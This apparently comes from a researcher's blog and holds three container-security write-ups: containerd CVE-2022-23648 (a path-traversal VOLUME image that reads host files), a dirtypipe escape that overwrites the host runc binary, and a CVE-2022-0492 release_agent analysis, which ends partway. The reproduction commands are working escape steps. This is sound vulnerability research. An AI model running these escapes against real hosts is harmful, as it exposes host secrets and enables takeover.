As Felix points out When this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.

“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”

The point here is ‘seed the contents of the mount with data in the image at the same location’. It means if the image has data in the mount directory the implementation should also contains the origin data.

            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            RUN mkdir /volume-test
            RUN echo "volume data" > /volume-test/aaa
            VOLUME /volume-test/

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
            Sending build context to Docker daemon  3.584kB
            Step 1/4 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/4 : RUN mkdir /volume-test
            ---> Using cache
            ---> a05c3161c55d
            Step 3/4 : RUN echo "volume data" > /volume-test/aaa
            ---> Running in 60702a1547f5
            Removing intermediate container 60702a1547f5
            ---> 4702775454c2
            Step 4/4 : VOLUME /volume-test/
            ---> Running in 14963733faf9
            Removing intermediate container 14963733faf9
            ---> cc3e2700af76
            Successfully built cc3e2700af76
            Successfully tagged volume-test1:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
            root@20939034b463:/# mount | grep volume
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
            root@20939034b463:/# ls /volume-test/
            aaa
            root@20939034b463:/# cat /volume-test/aaa 
            volume data

As we can see, the origin data is in the volue. This is mean ‘seed’ the data. If we do more investigation we can see there are two file named ‘aaa’.

            root@ubuntu:/home/test# find /var/lib/ -name aaa
            /var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
            /var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
            /var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa

The first is the ‘data’ in the volume, the second and third is the same file which in the container image. The first file is copied from the second directory.

Now we know how the ‘VOLUME’ works from OCI image configuration to OCI runtime configuration. In order to seed the data, the converter need to copy the data in the original image to the container’s mount directory.

The vulnerability

The vulnerability occurs in the seed process of containerd. Say if we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”, then the copy process will be:

            copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/    /var/lib/docker/volumes/yyy/_data/

The containerd tries to copy the file in image to the volumes. But it doesn’t check the src this src can be controlled in the OCI image configuration.

The ‘volumeMounts’ in ‘cri/server/container_create.go’ create mounts from ‘Volumes’.

            func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
                    ...
                    var mounts []*runtime.Mount
                    for dst := range config.Volumes {
                            ...
                            volumeID := util.GenerateID()
                            src := filepath.Join(containerRootDir, "volumes", volumeID)
                            // addOCIBindMounts will create these volumes.
                            mounts = append(mounts, &runtime.Mount{
                                    ContainerPath:  dst,
                                    HostPath:       src,
                                    SelinuxRelabel: true,
                            })
                    }
                    return mounts
            }

The ‘ContainerPath’ can be the malicious path.

Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.

            if len(volumeMounts) > 0 {
                    mountMap := make(map[string]string)
                    for _, v := range volumeMounts {
                            mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
                    }
                    opts = append(opts, customopts.WithVolumes(mountMap))
            }

Finally in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’.

	for host, volume := range volumeMounts {
		// The volume may have been defined with a C: prefix, which we can't use here.
		volume = strings.TrimPrefix(volume, "C:")
		for _, mountPath := range mountPaths {
			src := filepath.Join(mountPath, volume)
			if _, err := os.Stat(src); err != nil {
				if os.IsNotExist(err) {
					// Skip copying directory if it does not exist.
					continue
				}
				return fmt.Errorf("stat volume in rootfs: %w", err)
			}
			if err := copyExistingContents(src, host); err != nil {
				return fmt.Errorf("taking runtime copy of volume: %w", err)
			}
		}
	}

Here the ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, ‘host’ is the host directory that will be mount in the container. The ‘src’ of ‘copyExistingContents’ parameter will like ‘/xxx/xx/../../../../../../../../../etc’, and becomes ‘/etc/’ and this in the host filesystem. So ‘copyExistingContents’ will copy the host filesystem data to the container.

The fix is in this commit.

            @@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
                                    // The volume may have been defined with a C: prefix, which we can't use here.
                                    volume = strings.TrimPrefix(volume, "C:")
                                    for _, mountPath := range mountPaths {
            -				src := filepath.Join(mountPath, volume)
            +				src, err := fs.RootPath(mountPath, volume)
            +				if err != nil {
            +					return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
            +				}
                                            if _, err := os.Stat(src); err != nil {
                                                    if os.IsNotExist(err) {
                                                            // Skip copying directory if it does not exist.

It just uses the ‘fs.RootPath’ to replace ‘filepath.Join’. The ‘fs.RootPath’ will evaluate and bound any symlink in ‘volume’ to the root directory.

Reproduce

The vulnerability itself is easy to understand. I failed when I tried to use the docker or ctr to reproduce this issue. Fu wei, a containerd maintainer, tells me I should use crictl to reproduce this as the vulnerability code is shipped in the CRI plugin of containerd. This part is mostly about how to setup the crictl environment. In the process I asked a lot from Bonan and Fu wei, thanks! The setup process is mostly from this post

Download crictl and set the environment

In the cri-tools release page we download a v1.23.0 version.

            root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
            crictl
            root@ubuntu:/home/test# crictl  --version
            crictl version v1.23.0

Create a new file in /etc/crictl.yaml and add the following configuration.

            runtime-endpoint: unix:///var/run/containerd/containerd.sock
            image-endpoint: unix:///var/run/containerd/containerd.sock
            timeout: 10
            debug: false

Create the containerd config file /etc/containerd/config.toml

            root@ubuntu:/home/test# mkdir /etc/containerd
            root@ubuntu:/home/test# vi /etc/containerd/config.toml
            root@ubuntu:/home/test# systemctl  restart containerd
            root@ubuntu:/home/test# cat /etc/containerd/config.toml 
            [plugins]
            [plugins.cri]
            sandbox_image = "rancher/pause:3.1"
            [plugins.cri.cni]
            bin_dir = "/opt/cni/bin"
            conf_dir = "/etc/cni/net.d"
            [plugins.cri.registry]
            [plugins.cri.registry.mirrors]
                    [plugins.cri.registry.mirrors."docker.io"]
                    endpoint = ["https://docker.mirrors.ustc.edu.cn"]
            [plugins.linux]
            shim = "containerd-shim"
            runtime = "runc"
            runtime_root = ""
            no_shim = false
            shim_debug = false

Install cni plugin. Download it from cni plugin page.

            root@ubuntu:/home/test# mkdir -p /opt/cni/bin
            root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz  -C /opt/cni/bin
            ./
            ./macvlan
            ./static
            ./vlan
            ./portmap
            ./host-local
            ./vrf
            ./bridge
            ./tuning
            ./firewall
            ./host-device
            ./sbr
            ./loopback
            ./dhcp
            ./ptp
            ./ipvlan
            ./bandwidth
            root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
            root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
            root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
            {
            "cniVersion": "0.2.0",
            "name": "mynet",
            "type": "bridge",
            "bridge": "cni0",
            "isGateway": true,
            "ipMasq": true,
            "ipam": {
                    "type": "host-local",
                    "subnet": "10.22.0.0/16",
                    "routes": [
                    { "dst": "0.0.0.0/0" }
                    ]
            }
            }

            root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
            {
            "cniVersion": "0.2.0",
            "name": "lo",
            "type": "loopback"
            }

Create container and trigger vulnerability

Pull the pause image

          root@ubuntu:/home/test# crictl  pull registry.aliyuncs.com/google_containers/pause:3.6
          Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
          root@ubuntu:/home/test# crictl image
          IMAGE                                           TAG                 IMAGE ID            SIZE
          registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
          root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
          k8s.gcr.io/pause:3.6
          root@ubuntu:/home/test# crictl  image
          IMAGE                                           TAG                 IMAGE ID            SIZE
          k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
          registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB

Create the mailicious image

Built it.

            root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
            root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile 
            root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME  /../../../../../../../../etc/ssh
            ---> Running in 06720320c1f6
            Removing intermediate container 06720320c1f6
            ---> b253bcd6793c
            Successfully built b253bcd6793c
            Successfully tagged cve-2022-23648:latest
            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            VOLUME  /../../../../../../../../etc/ssh

            root@ubuntu:/home/test/CVE-2022-23648# 

Import it in containerd

          root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
          root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import  cve-2022-23648.tar 
          unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
          root@ubuntu:/home/test/CVE-2022-23648# crictl  image 
          IMAGE                                           TAG                 IMAGE ID            SIZE
          docker.io/library/cve-2022-23648                latest              b253bcd6793c2       75.1MB
          k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
          registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB

Run the malicious image

          root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
          ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
          root@ubuntu:/home/test/CVE-2022-23648# crictl pods
          POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
          3bf95742d0fb3       10 seconds ago      Ready               test                default             1                   (default)
          root@ubuntu:/home/test/CVE-2022-23648# crictl ps
          CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
          ba2d0c46c5502       docker.io/library/cve-2022-23648:latest   14 seconds ago      Running             test                0                   3bf95742d0fb3
          root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
          root@ubuntu:/# ls /etc/ssh/
          root@ubuntu:/# ls /etc/ssh

Emmm, no host data. Wha’t wrong. From this page, we can see my containerd is fixed.

            root@ubuntu:/home/test# containerd --version
            containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2 
            root@ubuntu:/home/test# which containerd
            /usr/bin/containerd
            root@ubuntu:/home/test# stat /usr/bin/containerd
            File: /usr/bin/containerd
            Size: 60305392  	Blocks: 117784     IO Block: 4096   regular file
            Device: 805h/2053d	Inode: 5769129     Links: 1
            Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
            Access: 2022-03-25 23:43:13.235999616 -0700
            Modify: 2022-02-25 12:15:25.000000000 -0800
            Change: 2022-03-14 06:37:43.871583849 -0700
            Birth: -

Install a lower version.

          root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
          Stopped sandbox 3bf95742d0fb3
          root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
          Removed sandbox 3bf95742d0fb3
          root@ubuntu:/home/test/CVE-2022-23648# crictl pods
          POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
          root@ubuntu:/home/test/CVE-2022-23648# crictl ps
          CONTAINER           IMAGE               CREATED             STATE               NAME                ATTEMPT             POD ID


          root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
          fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
          root@ubuntu:/home/test/CVE-2022-23648# crictl pods
          POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
          1ecc6bee60024       4 seconds ago       Ready               test                default             1                   (default)
          root@ubuntu:/home/test/CVE-2022-23648# crictl ps
          CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
          fe4ef77ab8e31       docker.io/library/cve-2022-23648:latest   7 seconds ago       Running             test                0                   1ecc6bee60024
          root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
          root@ubuntu:/# ls /etc/ssh
          host_file  ssh_config  ssh_config.d
          root@ubuntu:/# cat /etc/ssh/host_file 
          host
          root@ubuntu:/# exit
          exit
          root@ubuntu:/home/test/CVE-2022-23648# containerd --version
          containerd github.com/containerd/containerd 1.3.3-0ubuntu2 

Finally we reproduce this vulnerability.

The end

After reproducing this vulnerability, I want to know why docker and ctr can’t work and discuss a lot with Fu wei. Some the conclusion I made(not sure whether it is 100% accurate):

CRI is the interface between Kubernetes and container runtime. OCI is the spec of how to run a container. So there need some software between the CRI and OCI. This software need to implemenetation CRI interface to Kuberentes and they also need to convert the CRI request to the low level OCI spec and lanuch container. containerd、cri-o is this kind of software. The Kubernetes can also use the docker to run container, But it needs the docker-shim to interacts using CRI interface.

containerd. containerd is a container runtime that can be used to manage the container. The containerd not just contain CRI interface, but also some other container management interface.
ctr. ctr is the client test tool of containerd, it just not releated with CRI.
crictl. crictl is a CLI for CRI-compatible container runtimes. It can interact with CRI runtime to manage container.
docker. docker is not related CRI, just another container management.

As the vulnerability is in the CRI plugin of containerd, we can only trigger it in the CRI path. In this post I use the crictl to trigger it. It can be also triggered in the Kubernetes which uses the containerd as the CRI runtime.

reference

containerd: Insecure handling of image volumes

使用containerd单独创建容器

Container escape using dirtypipe

2022-03-19T00:00:00+00:00

Background

The story begins with the pictures that Yuval Avrahami shows in twitter. Here it is:

It means we can write the host files in /bin directory by using dirtypipe, though in fact the dirtypipe just modify the file’s pagecache.

Then the moresec security researcher also write a post to show the capability of using dirtypipe to do container escape. Also some other researcher such as drivertom successfully do this.

At the busy working day, I just have no time to do more experiment. I just discussed the point with some friends. Anyway at the first glance, it seems dirtypipe can’t be used to do cantainer escape. It is not difficult to understand that the dirtypipe can change the file in other containers as the container may share some of layer files. But as there is only a file ‘/proc/self/exe’ as I know that can be interacted with the host filesystem. However after CVE-2019-5736, the runc binary is cloned by memfd_create in memory and it seems we can just overwrite the cloned binary but not the actually runc binary in host filesystem.

So how these guys achieve the container escape by using dirtypipe? Bonan, another excellent cloud native security researcher, mentions that maybe the memfd_create file is copy-on-write. Then the cloned and the host runc binary maybe share the same physical page, as the dirtypipe modify the cloned pagecache, it also affects the host runc binary. This is quite explainable. I’m more sure ‘cloned and host runc binary share the same physical page’ is the reason after I dig into the internals of ‘memfd_create’ and ‘sendfile’ syscall.

Experiment

If our guess is right, we can stop the escape by using the ‘read’ runc and ‘write’ to memfd_create file to let the memfd_create file and host runc file don’t share the physical page. Anyway, this is just a guess, we need to prove it. First let’s try to escape and overrite the runc binary from container.

This is easy to achieve by combining the everywhere CVE-2019-5736 poc and dirtypipe PoC. After get the read only runc binary, we can use the dirtypipe to overwrite it.

Before the escape:

            root@ubuntu:/home/test/go/src/runc# mv runc /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            70df137b272bd8fb1e3e63e90d77943a  /usr/sbin/runc

After the escape:

            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            687765833647de6091b82896fe90844a  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# head -c 20 /usr/sbin/runc
            ELdirtypipe>root@ubuntu:/home/test/go/src/runc# runc --version
            bash: /usr/sbin/runc: cannot execute binary file: Exec format error

As we can see the host binary is modified so we can do container escape by using dirtypipe. So let’t do the second experiment: don’t use the sendfile but just use the read-and-write copy (deep copy). Fortunately the runc code just has the methods, we can easily test it by comment out the sendfile. The patches is:

            --- a/libcontainer/nsenter/cloned_binary.c
            +++ b/libcontainer/nsenter/cloned_binary.c
            @@ -507,13 +507,14 @@ static int clone_binary(void)
                            goto error_binfd;
            
                    while (sent < statbuf.st_size) {
            -               int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
            -               if (n < 0) {
            +               //int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
            +               int n = 0;
            +               //if (n < 0) {
                                    /* sendfile can fail so we fallback to a dumb user-space copy. */
                                    n = fd_to_fd(execfd, binfd);
                                    if (n < 0)
                                            goto error_binfd;
            -               }
            +               //}
                            sent += n;

After compile the new runc, we the output shows as following:

            root@ubuntu:/home/test/go/src/runc# cp runc  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# runc --version
            runc version 1.1.0+dev
            commit: v1.1.0-92-g98b75bef-dirty
            spec: 1.0.2-dev
            go: go1.18
            libseccomp: 2.5.1
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            8a5acd21ac5099abf40c15c815c97de1  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            ece16f4f8aa1518d95a19e9c5b2cb66b  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# runc --version
            bash: /usr/sbin/runc: cannot execute binary file: Exec format error

Emmm, interesting, the runc binary is still be modified. We need to go to the runc code to find the truth. After a moment, a suspices function appears. In the clone_binary it calls ‘try_bindfd’ to get a execfd, it ‘try_bindfd’ success, the ‘sendfile’ and ‘fd_to_fd’ will never be executed. The comment is quite clear, the copying will be executed only when ‘try_bindfd’ failed.

            static int clone_binary(void)
            {
                    int binfd, execfd;
                    struct stat statbuf = { };
                    size_t sent = 0;
                    int fdtype = EFD_NONE;

                    /*
                    * Before we resort to copying, let's try creating an ro-binfd in one shot
                    * by getting a handle for a read-only bind-mount of the execfd.
                    */
                    execfd = try_bindfd();
                    if (execfd >= 0)
                            return execfd;

                    ...
            }

Let’s comment out the calling of ‘try_bindfd’. Notice: this time we comment out the ‘try_bindfd’ and ‘sendfile’ and uses ‘fd_to_fd’.

            root@ubuntu:/home/test/go/src/runc# cp runc  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# runc --version
            runc version 1.1.0+dev
            commit: v1.1.0-92-g98b75bef-dirty
            spec: 1.0.2-dev
            go: go1.18
            libseccomp: 2.5.1
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            49f35f333efdfaf628bcd48aee611340  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            49f35f333efdfaf628bcd48aee611340  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# runc --version
            runc version 1.1.0+dev
            commit: v1.1.0-92-g98b75bef-dirty
            spec: 1.0.2-dev
            go: go1.18
            libseccomp: 2.5.1

OK, as we can see we can’t modify the runc binary by the deep copy.

Let’s do the final experiment. This test will comment out ‘try_bindfd’ only and the runc will uses ‘sendfile’. As our guess, the runc will also be modified.

            root@ubuntu:/home/test/go/src/runc# cp runc  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# runc --version
            runc version 1.1.0+dev
            commit: v1.1.0-92-g98b75bef-dirty
            spec: 1.0.2-dev
            go: go1.18
            libseccomp: 2.5.1
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            81dd1b92fe8a80a0682b8ac117821790  /usr/sbin/runc
            root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
            81dd1b92fe8a80a0682b8ac117821790  /usr/sbin/runc

Emmm, interesting again, the runc isn’t been modified. Our guess is wrong. Then I modify the dirtypipe PoC from splice syscall to sendfile syscall, as expected, it doesn’t work. So the answer is: The sendfile syscall doesn’t share the physical page between src file and dst file.

Conclusion

After look into the source code, I find the ‘sendfile’ syscall is actually not share the physical page between src file and dst file. It works as following:

splice the src file to a internal created pipe, this will share the src file pagecache to the pipe.
Then splice the data in pipe to the dst file, this will do the actual copy but no share.

This behaviour also apply to the splice syscall. That is to say in splice file to pipe case the page is shared and in pipe to splice the data is not shared but actaully copied.

So the function who is responsible for container escape is ‘try_bindfd’ which is introduced in this commit. From the commit message, we know that after introduce the fix for CVE-2019-5736, the runc community decide to use a more effective methods to avoid the vulnerability. It creats a read-only bind-mount of the runc binary and then get the runc bind handle and finally unmount it. This way the runc binary can’t be overwrite. In this methods, the /proc/self/exe is still point the runc binary in host filesystem. Combinie with the dirtypipe, we can write the actual runc binary in host.

After the CVE-2019-5736, most of the security researcher think that the fix is to use memfd_create to create a file in memory and copy the runc binary to this file, but this is wrong. As we can do container escape using dirtypipe, so we think the sendfile shares the src file and dst file. But again this is wrong. This two wrong assumption makes the thing work and seems to be expainable. Just like negative plus negative equals positive. There is an old chinese saying, “we can only get superficial knowledge from paper, but deep knowledge from practice”，纸上得来终觉浅，绝知此事要躬行. The process of exploring the container escape using dirtypipe just remind of this old saying.

Return the Yuval pictures, it modifies the files in /bin directory. I’m not sure this is the case that Yuval escape. If he escapes from /proc/self/exe can then the shellcode modify the file in /bin directory it will be like what pictures show, if it isn’t the case, there maybe another interesting things.

reference

The Dirty Pipe Vulnerability

从DirtyPipe到Docker逃逸

CVE-2022-0492: how release_agent escape become a vulnerability

2022-03-06T00:00:00+00:00

The cgroup release_agent escape is a classical user mode helper escape issue several years ago. Recently it has a CVE and become popular. At first glance I don’t know why and has little time to dig into the issue why it has a CVE now. After read Yuval Avrahami’s post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape and discussed with him I found there are a lot of things after CVE-2022-0492 so I decide make a post.

CVE-2022-0492

In previous release_agent escape, we need to add CAP_SYS_ADMIN capability to the container. CVE-2022-0492 shows us that we can mount cgroupfs in new userns and then write to the release_agent file. Following is the reproducer.

The docker doesn’t give CAP_SYS_ADMIN to container.

    root@ubuntu:/home/test# docker run --rm -it --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu bash
    root@26604070fc87:/# cat /proc/self/status | grep Cap
    CapInh:	00000000a80425fb
    CapPrm:	00000000a80425fb
    CapEff:	00000000a80425fb
    CapBnd:	00000000a80425fb
    CapAmb:	0000000000000000


    test@ubuntu:~$ capsh --decode=00000000a80425fb
    WARNING: libcap needs an update (cap=40 should have a name).
    0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

Then in the container we execute unshare to create new user namespace and cgroup namespace. Then we can mount the cgroupfs and write our data to release_agent.

    root@26604070fc87:/# unshare -UrmC bash
    root@26604070fc87:/# cat /proc/self/status | grep Cap
    CapInh:	0000000000000000
    CapPrm:	000001ffffffffff
    CapEff:	000001ffffffffff
    CapBnd:	000001ffffffffff
    CapAmb:	0000000000000000
    root@26604070fc87:/# mount -t cgroup -o rdma cgroup /mnt
    root@26604070fc87:/# ls /mnt
    cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks
    root@26604070fc87:/# echo "test" > /mnt/release_agent 
    root@26604070fc87:/# cat /mnt/release_agent 
    test

Why sysfs and procfs can't work

The poc is not complex, but the detail behind it has a lot of things. The first is that why core_pattern and uevent_helper can’t work. Let’s see whether we can mount sysfs or procfs in new user namespace.

    root@26604070fc87:/# mkdir /tmp/procfs
    root@26604070fc87:/# mkdir /tmp/sysfs
    root@26604070fc87:/# mount -t proc procfs /tmp/procfs 
    mount: /tmp/procfs: permission denied.
    root@26604070fc87:/# mount -t sysfs sysfs /tmp/sysfs
    mount: /tmp/sysfs: permission denied.

As we can see, we can’t mount it.

The mount syscall path is as following:

    SYSCALL_DEFINE5(mount)
            -->do_mount
                    -->do_new_mount
                            -->mount_capable
                            -->vfs_get_tree
                            -->do_new_mount_fc
                                    -->mount_too_revealing
                                    -->vfs_create_mount
                                    -->do_add_mount

The first permission check is at ‘mount_capable’. Notice the user ns passed to ‘ns_capable’ is fs_context’s user ns.

    bool mount_capable(struct fs_context *fc)
    {
            if (!(fc->fs_type->fs_flags & FS_USERNS_MOUNT))
                    return capable(CAP_SYS_ADMIN);
            else
                    return ns_capable(fc->user_ns, CAP_SYS_ADMIN);
    }

The ‘fc->user_ns’ is set in the ‘init_fs_context’ callback of ‘struct file_system_type’. In the cgroupfs case, as we unshare user namespace and cgroup namespace together. So the ‘fc->user_ns’ is the new user namespace and has the CAP_SYS_ADMIN. So it will pass the ‘mount_capable’ check.

    static int cgroup_init_fs_context(struct fs_context *fc)
    {
            struct cgroup_fs_context *ctx;

            ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
            if (!ctx)
                    return -ENOMEM;

            ctx->ns = current->nsproxy->cgroup_ns;
            ...
            fc->user_ns = get_user_ns(ctx->ns->user_ns);
            fc->global = true;
            return 0;
    }

In the procfs case, the ‘proc_init_fs_context’ set the fc->user_ns to the pid_ns.

    static int proc_init_fs_context(struct fs_context *fc)
    {
            struct proc_fs_context *ctx;

            ctx = kzalloc(sizeof(struct proc_fs_context), GFP_KERNEL);
            if (!ctx)
                    return -ENOMEM;

            ctx->pid_ns = get_pid_ns(task_active_pid_ns(current));
            put_user_ns(fc->user_ns);
            fc->user_ns = get_user_ns(ctx->pid_ns->user_ns);
            fc->fs_private = ctx;
            fc->ops = &proc_fs_context_ops;
            return 0;
    }

As we don’t create a new pid ns so the fc->user_ns is the init user ns. And in this user namespace the container has no CAP_SYS_ADMIN so it will not pass the ‘mount_capable’ check.

Why 'unshare -UrmC -pf bash' can't work

So what about we also unshare the pid namespace.

    root@26604070fc87:/# mount -t proc procfs /mnt
    mount: /mnt: permission denied.

We still can’t mount procfs in the new usernamespace and pid namespace. This time we will pass the ‘mount_capable’ check. However we will go to the second permission check of mount.

The second permission check is at ‘mount_too_revealing’. This function is interesting.

    static bool mount_too_revealing(const struct super_block *sb, int *new_mnt_flags)
    {
            const unsigned long required_iflags = SB_I_NOEXEC | SB_I_NODEV;
            struct mnt_namespace *ns = current->nsproxy->mnt_ns;
            unsigned long s_iflags;

            if (ns->user_ns == &init_user_ns)
                    return false;

            /* Can this filesystem be too revealing? */
            s_iflags = sb->s_iflags;
            if (!(s_iflags & SB_I_USERNS_VISIBLE))
                    return false;

            if ((s_iflags & required_iflags) != required_iflags) {
                    WARN_ONCE(1, "Expected s_iflags to contain 0x%lx\n",
                            required_iflags);
                    return true;
            }

            return !mnt_already_visible(ns, sb, new_mnt_flags);
    }

The ‘mount_too_revealing’ is used only in new user namespace as we can see it return ‘false’ if it is called in the init_user_ns. So I guess the ‘revealing’ reveals the meaning, if the mount operation reveals too much data the kernel should deny it. The first interesting part is ‘SB_I_USERNS_VISIBLE’. If the super_block data doesn’t set it, it just bypassed this reveal check. The only two fs who set this in sysfs and procfs.

            if (!(s_iflags & SB_I_USERNS_VISIBLE))
                    return false;

For example, the ‘proc_fill_super’ set it in ‘proc_fill_super’

    static int proc_fill_super(struct super_block *s, struct fs_context *fc)
    {
            s->s_iflags |= SB_I_USERNS_VISIBLE | SB_I_NOEXEC | SB_I_NODEV;
    }

So in the ‘mount_too_revealing’ permission check, the cgroupfs passed it. The procfs and sysfs will go to ‘mnt_already_visible’ which we can’t pass the permission check.

    static bool mnt_already_visible(struct mnt_namespace *ns,
                                    const struct super_block *sb,
                                    int *new_mnt_flags)
    {
            int new_flags = *new_mnt_flags;
            struct mount *mnt;
            bool visible = false;

            down_read(&namespace_sem);
            lock_ns_list(ns);
            list_for_each_entry(mnt, &ns->list, mnt_list) {
                    struct mount *child;
                    int mnt_flags;

                    ...
                    list_for_each_entry(child, &mnt->mnt_mounts, mnt_child) {
                            struct inode *inode = child->mnt_mountpoint->d_inode;
                            /* Only worry about locked mounts */
                            if (!(child->mnt.mnt_flags & MNT_LOCKED))
                                    continue;
                            /* Is the directory permanetly empty? */
                            if (!is_empty_dir_inode(inode))
                                    goto next;
                    }
                    /* Preserve the locked attributes */
                    *new_mnt_flags |= mnt_flags & (MNT_LOCK_READONLY | \
                                            MNT_LOCK_ATIME);
                    visible = true;
                    goto found;
            next:	;
            }
    found:
            unlock_ns_list(ns);
            up_read(&namespace_sem);
            return visible;
    }

	"maskedPaths": [
		"/proc/acpi",
		"/proc/asound",
		"/proc/kcore",
		"/proc/keys",
		"/proc/latency_stats",
		"/proc/timer_list",
		"/proc/timer_stats",
		"/proc/sched_debug",
		"/sys/firmware",
		"/proc/scsi"
	],

As we can see some of the proc and sys file is masked in container which means the container has no fully view of procfs and sysfs. The ‘maskedPaths’ is implemented by mounting these file to ‘/dev/null’ so the procfs has child mountpoint. As I don’t want find how to set docker’s maskedPath, let’s use runc as test. Also we will use sysfs as we just need to delete one line.

First we need delete the runc’s default config.json rootfs readonly configuration

     "readonly": true

The sysfs user the netns’s user namespace so we need use ‘unshare -Urmn sh’.

    root@ubuntu:~/mycontainer# runc run test
    / # unshare -Urmn sh
    / # mkdir /mnt
    / # mount -t sysfs -o ro sysfs /mnt
    mount: permission denied (are you root?)

Next we delete the ‘/sys/firmware’ in maskedPaths in config.json. Now we can see we mount sysfs successfully.

    root@ubuntu:~/mycontainer# runc run test
    / # unshare -Urmn sh
    / # mount -t sysfs -o ro sysfs /mnt
    / # ls /mnt
